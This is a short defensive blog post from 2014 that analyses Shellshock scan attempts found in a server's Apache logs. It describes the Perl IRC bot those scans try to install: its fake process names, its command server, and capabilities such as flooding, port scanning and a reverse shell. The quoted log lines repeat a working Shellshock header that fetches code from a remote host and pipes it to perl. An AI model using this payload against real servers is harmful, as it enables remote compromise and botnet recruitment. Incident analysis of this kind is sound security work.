Decode of IRC bot deployed by shellshock vulnerability

Today I saw a shellshock scan against my apache logs:

[Mon Nov 03 16:43:02 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/vpasswd.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:43:14 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/tigvote.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:43:32 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/smartsearch, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:17 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/newsdesk.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:21 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/musicqueue.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:23 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/mt-static, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:28 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/mmstdod.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:32 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/main.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:48 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/ImageFolio, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:55 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/html2chtml.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:45:21 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/ezshopper, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:45:34 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/dfire.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:46:19 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/book.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:46:28 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/bb-rep.shHTTP
[Mon Nov 03 16:46:38 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/auktion.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:46:39 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/auction, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl

What this means in layman's terms is that the requester seems to think I'll execute the code in the referrer header (some CGI scripts would do this, especially with the bash vulnerability). What it wants me to do is go to that URL, download the code contained within, and execute it.

This is dangerous. I don't recommend it.  It's obsfucated by using base64 encoding. I changed the exec statement to a print, and output that to a file.  I zipped both and they are both here (note that you have to alter the URL to end in .xxx, download it and rename it to .zip, because google) for forensic purposes.

It looks like the bot will change its name in the process table to one of the following:

my @rps = ("/usr/local/apache/bin/httpd -DSSL",
 "/usr/sbin/httpd -k start -DSSL",
 "/usr/sbin/httpd",
 "ksoftirqd/0",
 "khelper",
 "kblockd",
 "/usr/sbin/apache2 -k start",
 "kmpathd",
 "httpd",
 "/usr/sbin/acpid",
 "/usr/sbin/cron");

Then it will connect to the IRC server 'mboost.su' on port 443. It will join #shock and accept commands from 'M', 'st0n3d','x00' and 'jorgee'.

 

It accepts a myriad of commands to UDP flood hosts, portscan them, connect to arbitrary ports, reverse shell, and ctcp/msg/noticeflood anyone on the IRC server. It can also send emails from the  target machine, and download any arbitrary file.

If you haven't patched your server, keep your eyes out. Exploits are definitely in the wild.

Leave a Reply